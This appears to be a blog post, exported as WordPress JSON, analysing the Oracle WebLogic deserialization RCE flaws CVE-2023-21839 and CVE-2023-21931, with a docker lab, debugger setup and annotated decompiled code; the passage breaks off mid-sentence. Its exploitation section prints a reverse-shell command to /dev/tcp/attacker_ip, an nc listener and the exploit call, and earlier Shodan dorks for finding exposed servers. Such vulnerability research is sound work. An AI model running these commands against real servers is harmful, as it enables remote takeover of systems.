{"id":68382,"date":"2023-06-26T15:38:26","date_gmt":"2023-06-26T07:38:26","guid":{"rendered":"https:\/\/version-2.com\/?p=68382"},"modified":"2023-07-24T18:16:27","modified_gmt":"2023-07-24T10:16:27","slug":"cve-2023-21931-cve-2023-21839-rce-via-post-deserialization","status":"publish","type":"post","link":"https:\/\/version-2.com\/en\/2023\/06\/cve-2023-21931-cve-2023-21839-rce-via-post-deserialization\/","title":{"rendered":"CVE-2023-21931 &#038; CVE-2023-21839 RCE via post-deserialization"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"68382\" class=\"elementor elementor-68382\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4da8c5f9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4da8c5f9\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;decf9c3&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-133ba185\" data-id=\"133ba185\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc2da8d post-content elementor-widget elementor-widget-text-editor\" data-id=\"fc2da8d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div><h1><span style=\"color: #000000;\">Introduction\u00a0<\/span><\/h1><p><span style=\"color: #000000;\">RCE via post-deserialization was found in Weblogic Server and has been found and registered as CVE-2023-21839 &amp; CVE-2023-21931 both have the same idea.<\/span><\/p><p><span style=\"color: #000000;\">Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation.<\/span><\/p><p><span style=\"color: #000000;\">The affected versions are 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0.<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2n55ehdswp0uqlbvkdd1te.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Weblogic server is a very much common software<\/span><\/p><p><span style=\"color: #000000;\">Some shodan dorks to search for weblogic server:<\/span><\/p><p><span style=\"color: #000000;\">&#8211; Oracle WebLogic Server<\/span><\/p><p><span style=\"color: #000000;\">&#8211; Weblogic<\/span><\/p><p><span style=\"color: #000000;\">&#8211; Weblogic Application Server<\/span><\/p><p><span style=\"color: #000000;\">You can also specify the ports.<\/span><\/p><p><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https:\/\/www.shodan.io\/search?query=Weblogic\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/www.shodan.io\/search?query=Weblogic<\/a><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2n5pmqdsxp0uql1rs60pj0.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Based on Greynoise, there are no attempts of exploiting this vulnerability<\/span><\/p><p><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https:\/\/viz.greynoise.io\/tag\/oracle-weblogic-cve-2023-21839-rce-attempt?days=3\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/viz.greynoise.io\/tag\/oracle-weblogic-cve-2023-21839-rce-attempt?days=3<\/a><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2n6a77dsyf0uqlga4b5y2c.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Background Story<\/span><\/p><p><span style=\"color: #000000;\">This time I fall for the rabbit hole and I didn&#8217;t even know!<\/span><\/p><p><span style=\"color: #000000;\">Weblogic turned out to be more complicated than I thought and what made this more complicated is<\/span><\/p><p><span style=\"color: #000000;\">1- How to debug it<\/span><\/p><p><span style=\"color: #000000;\">2- the GIOP protocol that&#8217;s used with the exploit<\/span><\/p><p><span style=\"color: #000000;\">The vulnerability idea is really simple.<\/span><\/p><p><span style=\"color: #000000;\">When you hunt for such vulnerabilities, especially in Java products, usually you try to find an entry point<\/span><\/p><p><span style=\"color: #000000;\">a serialization object where you send your payload<\/span><\/p><p><span style=\"color: #000000;\">The methodology I followed to analyze this CVE is as follows:<\/span><\/p><p><span style=\"color: #000000;\">&#8211; Understand how the exploit interacts with Weblogic<\/span><\/p><p><span style=\"color: #000000;\">&#8211; Follow the requests and understand the functions that getting triggered<\/span><\/p><p><span style=\"color: #000000;\">&#8211; Specify the related functions to the vulnerability (We don&#8217;t want the network functions such as T3 and GIOP)<\/span><\/p><p><span style=\"color: #000000;\">&#8211; Understand those functions and when the exploit really getting triggered &#8211; the root cause<\/span><\/p><p><span style=\"color: #000000;\">After I was basically sinking and trying to figure out how to find the start of the end of this maze, I found this blog by gobysec which they are the team who found this vulnerability explaining more about it and also about IIOP and T3.<\/span><\/p><p><span style=\"color: #000000;\">Since the whole exploitation is through T3 and IIOP so it&#8217;s better to understand. I found this blog and it&#8217;s from the same team &#8211; gobysec, the blog explained the vulnerability methodology in general but I couldn&#8217;t follow up with them because the quality of the pics is really bad.<\/span><\/p><p><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https:\/\/github.com\/gobysec\/Weblogic\/blob\/main\/Weblogic_Serialization_Vulnerability_and_IIOP_Protocol_en_US.md\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/gobysec\/Weblogic\/blob\/main\/Weblogic_Serialization_Vulnerability_and_IIOP_Protocol_en_US.md<\/a><\/span><\/p><p><span style=\"color: #000000;\">With that being said, I continued debugging my own way and followed the network traffic analysis which helped a lot.<\/span><\/p><p><span style=\"color: #000000;\">Build the\u00a0lab<\/span><\/p><p><span style=\"color: #000000;\">I&#8217;m using docker on Ubuntu server 20.04<\/span><\/p><p><span style=\"color: #000000;\"><em>Buckle up this is a long journey to go through<\/em><\/span><\/p><p><span style=\"color: #000000;\">Install docker<\/span><\/p><p><span style=\"color: #000000;\">&#8211; <code>apt update<\/code><\/span><\/p><p><span style=\"color: #000000;\">&#8211; <code>apt install docker docker-compose<\/code><\/span><\/p><h4><span style=\"color: #000000;\">Install Weblogic Server<\/span><\/h4><p><span style=\"color: #000000;\"><strong>First, install the docker of Weblogic server<\/strong><\/span><\/p><p><span style=\"color: #000000;\">&#8211; make a docker-compose.yml file and paste the following inside it.<\/span><\/p><p><span style=\"color: #000000;\">This container was created for cve-2020-2883 but we can use it for this vulnerability as well.<\/span><\/p><p><span style=\"color: #000000;\">&#8211; 8453 is the debugging port<\/span><\/p><p><span style=\"color: #000000;\">&#8211; 7001 is the Oracle WebLogic Server Listen Port for Administration Server<\/span><\/p><pre><span style=\"color: #000000;\"><code>version: '2'\nservices:\n weblogic:\n   image: vulfocus\/weblogic-cve_2020_2883:latest\n   ports:\n    - \"7001:7001\"\n    - \"8453:8453\"<\/code><\/span><\/pre><p><span style=\"color: #000000;\">Now run the command<\/span><\/p><p><span style=\"color: #000000;\"><code>docker-compose up .<\/code><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nfn1ldtj80uqie3v0gaec.png\" \/><\/span><\/p><p><span style=\"color: #000000;\"><code>sudo docker exec -it container_id bash<\/code><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2ng1l4dtk50uqi9tcphdtg.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">2- Go to <code>setDomainEnv.sh<\/code> file<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2ngi4udtdy0uqlf14y0zxl.png\" \/><\/span><\/p><p><span style=\"color: #000000;\"><code>vi bin\/setDomainEnv.sh<\/code><\/span><\/p><p><span style=\"color: #000000;\">3- Search for debugFlag and add the following:<\/span><\/p><pre><span style=\"color: #000000;\"><code>debugFlag=\"true\"\nexport debugFlag<\/code><\/span><\/pre><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nhebzdtg60uqlgd2r543d.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">4- Exit and restart the container<\/span><\/p><p><span style=\"color: #000000;\"><code>sudo docker restart container_id<\/code><\/span><\/p><p><span style=\"color: #000000;\"><strong>Copy the files from weblogic server<\/strong><\/span><\/p><p><span style=\"color: #000000;\">In order to debug the weblogic server we are going to copy the libs from inside the container and import them later inside our IDEA.<\/span><\/p><p><span style=\"color: #000000;\">1- Enter the container<\/span><\/p><p><span style=\"color: #000000;\"><code>sudo docker exec -it container_id bash<\/code><\/span><\/p><p><span style=\"color: #000000;\">2- Go to the following path:<\/span><\/p><p><span style=\"color: #000000;\"><code>\/u01\/oracle\/weblogic\/wlserver\/server<\/code><\/span><\/p><p><span style=\"color: #000000;\">as you can see here, we have the &#8220;lib&#8221; folder. here&#8217;s where all the libs of Weblogic server<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nim1edtjt0uql81mh4262.png\" \/><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nivnmdtke0uql39uj8mjk.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">3- Copy the lib folder<\/span><\/p><p><span style=\"color: #000000;\"><code>sudo docker cp container_id:\/u01\/oracle\/weblogic\/wlserver\/server\/lib .<\/code><\/span><\/p><p><span style=\"color: #000000;\">if you are using sudo, so the copied folder will be with root privs and you gotta change them so use the following<\/span><\/p><p><span style=\"color: #000000;\"><code>sudo chmod -R 755 lib<\/code><\/span><\/p><h4><span style=\"color: #000000;\">Setup the debugger<\/span><\/h4><p><span style=\"color: #000000;\">1- Create a new project<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nkbu5dtn20uql8yxaefl1.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">2- Go to the project structure<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nkpvfdtnn0uql1jnr42xk.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">First, add the SDK<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nl5dsdtvo0uqi7w3wfb2y.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Now go to Libraries and add the lib folder<\/span><\/p><p><span style=\"color: #000000;\">it should appear like this, after that click OK<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nlrq7dtx40uqi1xc85a6v.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">It supposes to show up like this. If not, try to remove it and re-add it or relaunch the IDEA<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nmkdrdtzf0uqi1o4be6ov.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Now let&#8217;s just configure the remote-debugger<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nmztgdttf0uqlfm5y260k.png\" \/><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nn6cydu0z0uqif4gnd635.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Change the name and most important the port to 8453<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nnmwadtv30uql3t38gwpb.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Now click debugging<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2no0skdu370uqi3re7bgf7.png\" \/><\/span><\/p><h4><span style=\"color: #000000;\">Decompile all the jar files<\/span><\/h4><p><span style=\"color: #000000;\">As an extra step here, we are going to decompile all the jar files of Weblogic so it will become more of an open-source code and easier to search through it for whatever we need.<\/span><\/p><p><span style=\"color: #000000;\">1- Copy all the weblogic folder from inside the container<\/span><\/p><p><span style=\"color: #000000;\"><code>sudo docker cp container_id:\/u01\/oracle\/weblogic .<\/code><\/span><\/p><p><span style=\"color: #000000;\">2- Change the permissions<\/span><\/p><p><span style=\"color: #000000;\"><code>sudo chmod -R 755 weblogic<\/code><\/span><\/p><p><span style=\"color: #000000;\">3- Use the following tool:<\/span><\/p><p><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https:\/\/github.com\/thoqbk\/code-collection\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/thoqbk\/code-collection<\/a><\/span><\/p><p><span style=\"color: #000000;\">you can just follow the instructions there, and just give it the source directory path (the weblogic src path) and the destination path and wait for a while.<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2np4nqdtyj0uqlcr6n4xcj.png\" \/><\/span><\/p><h1><span style=\"color: #000000;\">Reproduce the vulnerability<\/span><\/h1><h4><span style=\"color: #000000;\">Requirements<\/span><\/h4><p><span style=\"color: #000000;\">To reproduce the vulnerability we need the following tools:<\/span><\/p><p><span style=\"color: #000000;\">1- JNDI-Exploit-Kit<\/span><\/p><p><span style=\"color: #000000;\">Link: <a style=\"color: #000000;\" href=\"https:\/\/github.com\/pimps\/JNDI-Exploit-Kit\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/pimps\/JNDI-Exploit-Kit<\/a><\/span><\/p><p><span style=\"color: #000000;\">2- CVE-2023-21839 Exploitation script<\/span><\/p><p><span style=\"color: #000000;\">Link: <a style=\"color: #000000;\" href=\"https:\/\/github.com\/4ra1n\/CVE-2023-21839\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/4ra1n\/CVE-2023-21839<\/a><\/span><\/p><p><span style=\"color: #000000;\">3- a listener such as <code>nc<\/code><\/span><\/p><h4><span style=\"color: #000000;\">Run the exploitation<\/span><\/h4><p><span style=\"color: #000000;\">1- First start the JNDI-Exploit-Kit<\/span><\/p><p><span style=\"color: #000000;\"><code>java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C \"bash -i &gt;&amp; \/dev\/tcp\/attacker_ip\/1234 0&gt;&amp;1\" -J attacker_i:8180 -L attacker_i:1389 -R attacker_i:1099<\/code><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nqjo7du8j0uqi3f5a8wx3.png\" \/><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nqsk9du910uqi61j5c2yv.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">2- Run the scanner<\/span><\/p><p><span style=\"color: #000000;\"><code>nc -nvlp 1234<\/code><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nraw3du2q0uqlfa4sf2hy.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">3- Run the exploit<\/span><\/p><p><span style=\"color: #000000;\"><code>.\/CVE-2023-21839 -ip target_ip -ldap ldap:\/\/192.168.1.103:1389\/02snh7<\/code><\/span><\/p><p><span style=\"color: #000000;\">This part <code>ldap:\/\/192.168.1.103:1389\/02snh7<\/code> is copied from here:<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nrvlpdu3p0uqlbvutcewr.png\" \/><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2ns2uudu400uql8t8w06nc.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Now check the listener again<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nsl4ndu4n0uql58661a7w.png\" \/><\/span><\/p><p><span style=\"color: #000000;\"><code>java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C \"bash -i &gt;&amp; \/dev\/tcp\/192.168.1.107\/1234 0&gt;&amp;1\" -J 192.168.1.107:8180 -L 192.168.1.107:1389 -R 192.168.1.107:1099<\/code><\/span><\/p><h1><span style=\"color: #000000;\">Static Analysis &amp; Debugging<\/span><\/h1><h3><span style=\"color: #000000;\">Kick it off &#8211; because no one care<\/span><\/h3><p><span style=\"color: #000000;\">First, just to kick it off, let&#8217;s add a breakpoint and try the exploitation again<\/span><\/p><p><span style=\"color: #000000;\">Based on the blog by gobysec, which is the team who found this vulnerability<\/span><\/p><p><span style=\"color: #000000;\">Check it here: <a style=\"color: #000000;\" href=\"https:\/\/github.com\/gobysec\/Weblogic\/blob\/main\/WebLogic_CVE-2023-21931_en_US.md\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/gobysec\/Weblogic\/blob\/main\/WebLogic_CVE-2023-21931_en_US.md<\/a><\/span><\/p><p><span style=\"color: #000000;\">We have to add breakpoints on the following lines<\/span><\/p><p><span style=\"color: #000000;\">You can find the class in the path<\/span><\/p><p><span style=\"color: #000000;\"><code>\/lib\/wlthint3client.jar!\/weblogic\/jndi\/internal\/WLNamingManager.class<\/code><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2nudiadu910uql6h2udwzs.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Now run the exploit again and you will see how the debugger will pause.<\/span><\/p><h4><span style=\"color: #000000;\">finding the start of the maze<\/span><\/h4><p><span style=\"color: #000000;\">We can just start from the breakpoints where gobysec pointed. feel free to do that if you like. However, I like to understand the workflow of the software<\/span><\/p><p><span style=\"color: #000000;\">I started to click &#8220;step over&#8221; and add breakpoints on where ever the IDE taking me<\/span><\/p><p><span style=\"color: #000000;\">You can search for those classes and add breakpoints, or just with the step-over.<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2ny2f3dumv0uqiescz1ige.png\" \/><\/span><\/p><h4><span style=\"color: #000000;\">Breaking the magic<\/span><\/h4><p><span style=\"color: #000000;\">Since this is not an open-source project, I don&#8217;t have the same usual flexibility and by stepping over didn&#8217;t give me enough understanding, so I started with understanding the exploit, I used the go version and the python version.<\/span><\/p><p><span style=\"color: #000000;\">Link: <a style=\"color: #000000;\" href=\"https:\/\/github.com\/4ra1n\/CVE-2023-21839\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/4ra1n\/CVE-2023-21839<\/a><\/span><\/p><p><span style=\"color: #000000;\">Link: <a style=\"color: #000000;\" href=\"https:\/\/github.com\/houqe\/POC_CVE-2023-21839\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/houqe\/POC_CVE-2023-21839<\/a><\/span><\/p><p><span style=\"color: #000000;\">I edited a little bit on the go version and added a sleeping function between the requests, so it will be easier to monitor and see as much as I can on the IDE.<\/span><\/p><p><span style=\"color: #000000;\">Also, keep an eye on JDNI-Exploit to understand which request triggers Weblogic to call back to jndi-exploit<\/span><\/p><p><span style=\"color: #000000;\">&#8211; First part which is the data we entered gets printed.<\/span><\/p><pre><span style=\"color: #000000;\"><code>[*] your-ip: 192.168.1.109\n[*] your-port: 7001\n[*] your-ldap: ldap:\/\/192.168.1.110:1389\/uxnnvo<\/code><\/span><\/pre><p><span style=\"color: #000000;\">&#8211; Now we see the version of Weblogic<\/span><\/p><p><span style=\"color: #000000;\"><code>[*] weblogic 12<\/code><\/span><\/p><p><span style=\"color: #000000;\">We can see the part of the code here, where the exploit sends specific requests to identify the Weblogic version<\/span><\/p><p><span style=\"color: #000000;\">We can see the part of the code here, where the exploit sends specific requests to identify the Weblogic version<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2o1f0edusd0uqi03dp4tvn.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">I launched Wireshark and started scrolling through the traffic<\/span><\/p><p><span style=\"color: #000000;\">I filtered the traffic using <code>ip.src==target_ip<\/code> and found the following packet<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2o2hifdutk0uqihvxsdgda.png\" \/><\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2o2q6ndumo0uqlcj9mf4mk.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">&#8211; The Weblogic version detect request didn&#8217;t hit any breakpoint<\/span><\/p><p><span style=\"color: #000000;\">&#8211; The <code>[*] id=2 LocateRequest<\/code> the request didn&#8217;t hit any breakpoint as<\/span><\/p><p><span style=\"color: #000000;\">well, but this initiates communication with the t3 protocol<\/span><\/p><p><span style=\"color: #000000;\">&#8211; The <code>[*] id=3 RebindRequest<\/code> hit the breakpoint on WLSExecuteRequest.class:98<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2o40f3duvo0uqiej3b6ymh.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">There is some interesting info here such as &#8220;rebind_any&#8221;, and some other clues that we can follow on later.<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2o4dlhdup50uqlaq158y77.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">Step-in Inside the following try block in the image, the function checks if the method descriptor indicates a one-way invocation. If it does, <code>resp<\/code> remains null; otherwise, it retrieves the outbound response using the <code>request.getOutboundResponse()<\/code> method.<\/span><\/p><p><span style=\"color: #000000;\">Basically, the function handles the incoming requests<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2o4ucfdux40uqihc91hwaj.png\" \/><\/span><\/p><p><span style=\"color: #000000;\">keep following with the ide, the next breakpoint is on the invoke method<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2o5n4uduqo0uql2prtf51m.png\" \/><\/span><\/p><pre><span style=\"color: #000000;\"><code>public void invoke(RuntimeMethodDescriptor notused, InboundRequest request, OutboundResponse response) throws Exception {\n    try {\n        weblogic.iiop.InboundRequest iioprequest = (weblogic.iiop.InboundRequest)request;   =&gt; 1.\n        if (!iioprequest.isCollocated() &amp;&amp; iioprequest.getEndPoint().isDead()) {\n            throw new ConnectException(\"Connection is already shutdown for \" + request);\n        } else {\n            Integer m = (Integer)objectMethods.get(iioprequest.getMethod());  =&gt; 2.\n            ResponseHandler rh;\n            if (response == null) {  =&gt; 3. &amp; 4.\n                rh = NULL_RESPONSE;\n            } else {\n                rh = ((weblogic.iiop.OutboundResponse)response).createResponseHandler(iioprequest);\n            }\n            if (m != null) {  =&gt; 5.\n                this.invokeObjectMethod(m, iioprequest.getInputStream(), rh);\n            } else {  =&gt; 6.\n                this.delegate._invoke(iioprequest.getMethod(), iioprequest.getInputStream(), rh);\n            }\n            if (response != null) {  =&gt; 7.\n                response.transferThreadLocalContext(request);\n            }\n        }\n    } catch (ClassCastException var7) {  =&gt; 8.\n        throw new NoSuchObjectException(\"CORBA ties are only supported with IIOP\");\n    }\n}<\/code><\/span><\/pre><p><span style=\"color: #000000;\">1. It begins by attempting to cast the <code>InboundRequest<\/code> object to a specific type (`weblogic.iiop.InboundRequest`) to access additional functionality specific to this type of request.<\/span><\/p><p><span style=\"color: #000000;\">2. It checks if the request is collocated (executed within the same server) and if the endpoint associated with the request is dead (shutdown). If so, it throws a <code>ConnectException<\/code> indicating that the connection is already shutdown.<\/span><\/p><p><span style=\"color: #000000;\">3. If the request is valid, it retrieves the method identifier (`Integer`) from a map called <code>objectMethods<\/code> using the method obtained from the request.<\/span><\/p><p><span style=\"color: #000000;\">4. It determines the appropriate <code>ResponseHandler<\/code> to use based on the availability of the <code>OutboundResponse<\/code> object. If <code>response<\/code> is <code>null<\/code>, it uses a predefined <code>NULL_RESPONSE<\/code> handler. Otherwise, it creates a response handler specific to the type of request.<\/span><\/p><p><span style=\"color: #000000;\">5. If a method identifier (`m`) is found in the map, it means the method is an object method, and it invokes the method using the <code>invokeObjectMethod<\/code> method, passing the method identifier, the input stream from the request, and the response handler.<\/span><\/p><p><span style=\"color: #000000;\">6. If the method identifier is not found in the map, it delegates the invocation to the <code>_invoke<\/code> method of the <code>delegate<\/code> object, passing the method name, input stream, and response handler.<\/span><\/p><p><span style=\"color: #000000;\">7. If a response object is provided, it transfers the thread-local context from the request to the response object.<\/span><\/p><p><span style=\"color: #000000;\">8. If a <code>ClassCastException<\/code> occurs during the typecasting of the <code>InboundRequest<\/code> object, it throws a <code>NoSuchObjectException<\/code> indicating that CORBA ties are only supported with IIOP (Internet Inter-ORB Protocol).<\/span><\/p><p><span style=\"color: #000000;\">From there going to doAs method<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clj2o6z2wdus20uql8vbihkde.png\" \/><\/span><\/p><pre><span style=\"color: #000000;\"><code>public Object doAs(AbstractSubject kernelId, PrivilegedExceptionAction action) throws PrivilegedActionException {\n    if (action == null) {  =&gt; 1.\n        throw new SecurityException(SecurityLogger.getNullAction());\n    } else {\n        int sizeBeforePush = SubjectManager.getSubjectManager().getSize();  =&gt; 2.\n        SubjectManager.getSubjectManager().pushSubject(kernelId, this);  =&gt; 3.\n        Object actionResult = null;  =&gt; 4.\n        boolean var11 = false;\n        try {\n            var11 = true;\n            actionResult = action.run();\n            var11 = false;\n        } catch (RuntimeException var12) {\n            throw var12;\n        } catch (Exception var13) {\n            throw new PrivilegedActionException(var13);\n        } finally {\n            if (var11) {\n                int sizeBeforePop = SubjectManager.getSubjectManager().getSize();\n                while(sizeBeforePop-- &gt; sizeBeforePush) {\n                    SubjectManager.getSubjectManager().popSubject(kernelId);\n                }\n            }\n        }\n        int sizeBeforePop = SubjectManager.getSubjectManager().getSize();\n        while(sizeBeforePop-- &gt; sizeBeforePush) {\n            SubjectManager.getSubjectManager().popSubject(kernelId);\n        }\n        return actionResult;\n    }\n}<\/code><\/span><\/pre><p><span style=\"color: #000000;\">1. It first checks if the <code>action<\/code> parameter is <code>null<\/code>. If so, it throws an <code>SecurityException<\/code> indicating that the action is null.<\/span><\/p><p><span style=\"color: #000000;\">2. It retrieves the current size of the subject stack from the <code>SubjectManager<\/code> and assigns it to <code>sizeBeforePush<\/code>.<\/span><\/p><p><span style=\"color: #000000;\">3. It pushes the specified subject (`kernelId`) onto the subject stack using the <code>pushSubject<\/code> method of the <code>SubjectManager<\/code>.<\/span><\/p><p><span style=\"color: #000000;\">4. It initializes a variable <code>actionResult<\/code> to <code>null<\/code> &amp; It sets a boolean variable <code>var11<\/code> to <code>false<\/code> as 